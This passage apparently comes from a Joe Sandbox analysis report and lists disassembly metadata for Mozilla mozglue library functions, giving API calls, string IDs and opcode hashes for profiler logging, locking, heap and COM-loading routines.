                                                                  • Instruction Fuzzy Hash: 71310971A087548BC714DF38888025BB7E8BF81774F104B1EF865B36D0EB71A8448B92
                                                                  APIs
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DE220,?,?,?,?,6C063899,?), ref: 6C0638B2
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DE220,?,?,?,6C063899,?), ref: 6C0638C3
                                                                  • free.MOZGLUE(00000000,?,?,?,6C063899,?), ref: 6C0638F1
                                                                  • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6C063920
                                                                  • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6C063899,?), ref: 6C06392F
                                                                  • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6C063899,?), ref: 6C063943
                                                                  • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6C06396E
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                  • String ID:
                                                                  • API String ID: 3047341122-0
                                                                  • Opcode ID: 27f33b4a20c0e37d25d02f2a62725bb41b099957933d1632a5e72d98d4fa2719
                                                                  • Instruction ID: db7b84a3d6eaa2d8078febd196bdba3f994c1ca24ec4851ec18299c05262a49b
                                                                  • Opcode Fuzzy Hash: 27f33b4a20c0e37d25d02f2a62725bb41b099957933d1632a5e72d98d4fa2719
                                                                  • Instruction Fuzzy Hash: D321BF726017109FD7209F16C880B9AB7E9EF49728F258429E95A97F10CB30F845CBE1
                                                                  APIs
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0984F3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C09850A
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C09851E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C09855B
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C09856F
                                                                  • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0985AC
                                                                    • Part of subcall function 6C097670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C09767F
                                                                    • Part of subcall function 6C097670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C0985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C097693
                                                                    • Part of subcall function 6C097670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C0985B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0976A7
                                                                  • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C0985B2
                                                                    • Part of subcall function 6C075E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C075EDB
                                                                    • Part of subcall function 6C075E90: memset.VCRUNTIME140(6C0B7765,000000E5,55CCCCCC), ref: 6C075F27
                                                                    • Part of subcall function 6C075E90: LeaveCriticalSection.KERNEL32(?), ref: 6C075FB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                  • String ID:
                                                                  • API String ID: 2666944752-0
                                                                  • Opcode ID: 8716e760b388f5a458a953714b67fdc7a6beed8cdabb201a8b5652535660aed2
                                                                  • Instruction ID: 42438c26dddae9e68c8ce95158056b6e2acfa9f213b2a005cebbc34996f8fdb1
                                                                  • Opcode Fuzzy Hash: 8716e760b388f5a458a953714b67fdc7a6beed8cdabb201a8b5652535660aed2
                                                                  • Instruction Fuzzy Hash: B4212A752007019FDB149B68C888B5AB7F5AF8430DF244A2DE95BC7B41DB31F948DB51
                                                                  APIs
                                                                  • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C05B7CF
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C05B808
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6C05B82C
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C05B840
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C05B849
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                  • String ID: 3JT/
                                                                  • API String ID: 1977084945-2178588373
                                                                  • Opcode ID: 06f1b2c204657d84db18adc9fe32868e90d8d5cfd4f2b3789ecdc6f60239c447
                                                                  • Instruction ID: 32dfb67fb79abc98822073792396202c36ffe4ac19c8136bd4fafe913b8802a1
                                                                  • Opcode Fuzzy Hash: 06f1b2c204657d84db18adc9fe32868e90d8d5cfd4f2b3789ecdc6f60239c447
                                                                  • Instruction Fuzzy Hash: EC212AB4E002099FDF04DFA9C9856BEBBF4EF49314F148129EC16A7341E731A958CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09E047
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C09E04F
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09E09C
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C09E0B0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [I %d/%d] profiler_get_profile$3JT/
                                                                  • API String ID: 1832963901-2938366076
                                                                  • Opcode ID: b7857957ae637b05d6ed2bc58fd1d05b14d3a2fe97fff6b83658de122074ef32
                                                                  • Instruction ID: bba0612bc2e893903c9a29f33b0cc621ed3d402de7b1d8046c7f97be17c317d9
                                                                  • Opcode Fuzzy Hash: b7857957ae637b05d6ed2bc58fd1d05b14d3a2fe97fff6b83658de122074ef32
                                                                  • Instruction Fuzzy Hash: A521BE74A002088FDF009F64D858BAEBBF5BF89208F144428ED1A97741DB31BD49DBE1
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C0B6E78
                                                                    • Part of subcall function 6C0B6A10: InitializeCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6A68
                                                                    • Part of subcall function 6C0B6A10: GetCurrentProcess.KERNEL32 ref: 6C0B6A7D
                                                                    • Part of subcall function 6C0B6A10: GetCurrentProcess.KERNEL32 ref: 6C0B6AA1
                                                                    • Part of subcall function 6C0B6A10: EnterCriticalSection.KERNEL32(6C0DF618), ref: 6C0B6AAE
                                                                    • Part of subcall function 6C0B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0B6AE1
                                                                    • Part of subcall function 6C0B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C0B6B15
                                                                    • Part of subcall function 6C0B6A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C0B6B65
                                                                    • Part of subcall function 6C0B6A10: LeaveCriticalSection.KERNEL32(6C0DF618,?,?), ref: 6C0B6B83
                                                                  • MozFormatCodeAddress.MOZGLUE ref: 6C0B6EC1
                                                                  • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C0B6EE1
                                                                  • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C0B6EED
                                                                  • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C0B6EFF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                  • String ID: 3JT/
                                                                  • API String ID: 4058739482-2178588373
                                                                  • Opcode ID: cd21d53ef5f6be2261d101af09cc13b106cd647a4debbaca40cffcd02367ae91
                                                                  • Instruction ID: abfdb7e84979368264114c64c29ee0895b0f3b87106f7f0089ed6e31e1c28202
                                                                  • Opcode Fuzzy Hash: cd21d53ef5f6be2261d101af09cc13b106cd647a4debbaca40cffcd02367ae91
                                                                  • Instruction Fuzzy Hash: 5721A471A0421A9FDF04CF69D88569A77F5EF85308F044039F809A7251DB71AA58CF92
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0663D0
                                                                  • AcquireSRWLockExclusive.KERNEL32 ref: 6C0663DF
                                                                  • ReleaseSRWLockExclusive.KERNEL32 ref: 6C06640E
                                                                  • __Init_thread_footer.LIBCMT ref: 6C066467
                                                                  • ??$AddMarkerToBuffer@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@AAVProfileChunkedBuffer@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C0664A8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Marker$D@std@@ExclusiveLockProfileTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferBuffer@Buffer@1@Category@1@$$ChunkedCurrentD@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Init_thread_footerMarker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfilerReleaseStringThreadView@
                                                                  • String ID: 3JT/
                                                                  • API String ID: 3202982786-2178588373
                                                                  • Opcode ID: f4260452c00ca85fbf47fd83f1461c11dee0bda33dd1c1b0ca06598d610ad468
                                                                  • Instruction ID: b5f19330455462ba55d55575911cdac5949ef6325c81273fe08716591e4ec891
                                                                  • Opcode Fuzzy Hash: f4260452c00ca85fbf47fd83f1461c11dee0bda33dd1c1b0ca06598d610ad468
                                                                  • Instruction Fuzzy Hash: 0D316BB16082418FDB00DF69C04579ABBF8FB86319F15C52DE89583B51DB30B484CB67
                                                                  APIs
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F619
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C09F598), ref: 6C09F621
                                                                    • Part of subcall function 6C0994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C0994EE
                                                                    • Part of subcall function 6C0994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C099508
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C09F637
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000,?,6C09F598), ref: 6C09F645
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8,?,?,00000000,?,6C09F598), ref: 6C09F663
                                                                  Strings
                                                                  • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C09F62A
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                  • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                  • API String ID: 1579816589-753366533
                                                                  • Opcode ID: a7252f79aefea4f5685125b0151318c8e7641c939841f8f5adb5a0448b5f9959
                                                                  • Instruction ID: e4f64354042044ae38844954fd4b92fae03a4171edd73870a8abccf9319c616b
                                                                  • Opcode Fuzzy Hash: a7252f79aefea4f5685125b0151318c8e7641c939841f8f5adb5a0448b5f9959
                                                                  • Instruction Fuzzy Hash: 0F118C75201205ABCA04AF59C848BA977FDFF86269B545015FE0683F41CF71B821CBA1
                                                                  APIs
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,6C061C5F), ref: 6C0620AE
                                                                  • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0620CD
                                                                  • __Init_thread_footer.LIBCMT ref: 6C0620E1
                                                                  • FreeLibrary.KERNEL32 ref: 6C062124
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoInitializeSecurity$combase.dll
                                                                  • API String ID: 4190559335-2476802802
                                                                  • Opcode ID: 19db6c59ca8b1456829e5ff4d99b6c342ff34b0acc7a5b1d93c13e2416af0ace
                                                                  • Instruction ID: aa68234edbbef15fe9f6baf47d5d1f7cac22b2c08217f3c6ec02423accbe9256
                                                                  • Opcode Fuzzy Hash: 19db6c59ca8b1456829e5ff4d99b6c342ff34b0acc7a5b1d93c13e2416af0ace
                                                                  • Instruction Fuzzy Hash: 0821687620020AAFDF118F95DC48E9A3BFAFB0A765F108514FF1492A50DB31A861DFA1
                                                                  APIs
                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C0B76F2
                                                                  • moz_xmalloc.MOZGLUE(00000001), ref: 6C0B7705
                                                                    • Part of subcall function 6C06CA10: malloc.MOZGLUE(?), ref: 6C06CA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C0B7717
                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C0B778F,00000000,00000000,00000000,00000000), ref: 6C0B7731
                                                                  • free.MOZGLUE(00000000), ref: 6C0B7760
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                  • String ID: }>l
                                                                  • API String ID: 2538299546-52623869
                                                                  • Opcode ID: 2dfc588a44c1dde110a68de16e36ca8a570aa0a81402a1b3f694b5d899c0ee55
                                                                  • Instruction ID: 4a30e6fc1a0eb20ecc392d0ffe89d5c87ff7f8fa0011aed64bd1c9e9636fcf96
                                                                  • Opcode Fuzzy Hash: 2dfc588a44c1dde110a68de16e36ca8a570aa0a81402a1b3f694b5d899c0ee55
                                                                  • Instruction Fuzzy Hash: 9911C4B19002256BE710AF7A8C44BAFBEE8EF45354F044429F848E7300E7719940C7F2
                                                                  APIs
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C064A68), ref: 6C09945E
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C099470
                                                                    • Part of subcall function 6C099420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C099482
                                                                    • Part of subcall function 6C099420: __Init_thread_footer.LIBCMT ref: 6C09949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C0999C1
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0999CE
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C0DF4B8), ref: 6C0999F8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C099A05
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C099A0D
                                                                    • Part of subcall function 6C099A60: GetCurrentThreadId.KERNEL32 ref: 6C099A95
                                                                    • Part of subcall function 6C099A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C099A9D
                                                                    • Part of subcall function 6C099A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C099ACC
                                                                    • Part of subcall function 6C099A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C099BA7
                                                                    • Part of subcall function 6C099A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C099BB8
                                                                    • Part of subcall function 6C099A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C099BC9
                                                                    • Part of subcall function 6C08CBE8: GetCurrentProcess.KERNEL32(?,6C0531A7), ref: 6C08CBF1
                                                                    • Part of subcall function 6C08CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C0531A7), ref: 6C08CBFA
                                                                  Strings
                                                                  • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C099A15
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                  • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                  • API String ID: 2359002670-141131661
                                                                  • Opcode ID: 1bc41c5d4fc3230debce964155a0a3b75881675dd6a146c0bfe97bfe4b4572ab
                                                                  • Instruction ID: e18f9d9b33586d8ba1e9800cd38b4fb49a4526295b73a8109f092e0ef8ac8707
                                                                  • Opcode Fuzzy Hash: 1bc41c5d4fc3230debce964155a0a3b75881675dd6a146c0bfe97bfe4b4572ab
                                                                  • Instruction Fuzzy Hash: 86010032A042259FDB006F2998087A97BF8EF4621AF098016FD0D53B40CF34B804EAA2
                                                                  APIs
                                                                    • Part of subcall function 6C08AB89: EnterCriticalSection.KERNEL32(6C0DE370,?,?,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284), ref: 6C08AB94
                                                                    • Part of subcall function 6C08AB89: LeaveCriticalSection.KERNEL32(6C0DE370,?,6C0534DE,6C0DF6CC,?,?,?,?,?,?,?,6C053284,?,?,6C0756F6), ref: 6C08ABD1
                                                                  • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C061FDE
                                                                  • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C061FFD
                                                                  • __Init_thread_footer.LIBCMT ref: 6C062011
                                                                  • FreeLibrary.KERNEL32 ref: 6C062059
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1984330362.000000006C051000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C050000, based on PE: true
                                                                  • Associated: 00000004.00000002.1984315410.000000006C050000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984436094.000000006C0DE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                  • Associated: 00000004.00000002.1984479885.000000006C0E2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c050000_37664d9843.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                  • String ID: CoCreateInstance$combase.dll
                                                                  • API String ID: 4190559335-2197658831
                                                                  • Opcode ID: d20ad86b77655de140d53e699a221164143863e4da0081d8c71fb2ba61ee8fe8
                                                                  • Instruction ID: 60719153ea05fbf04e7f337a4fb3bc4df13a7967faa13379cbe8872959071472
                                                                  • Opcode Fuzzy Hash: d20ad86b77655de140d53e699a221164143863e4da0081d8c71fb2ba61ee8fe8
                                                                  • Instruction Fuzzy Hash: 64113A75201205AFEF10DF55C84CF9A3BF9EB4A359F10C029EE0592A41CB31B890DEA1
                                                                  APIs
                                                                  • ??KDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C0B9B74
                                                                  • ?ceil@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C0B9BBA
                                                                  • ?floor@Decimal@blink@@QBE?AV12@XZ.MOZGLUE ref: 6C0B9BC8
                                                                  • ??DDecimal@blink@@QBE?AV01@ABV01@@Z.MOZGLUE(?,?), ref: 6C0B9BD7
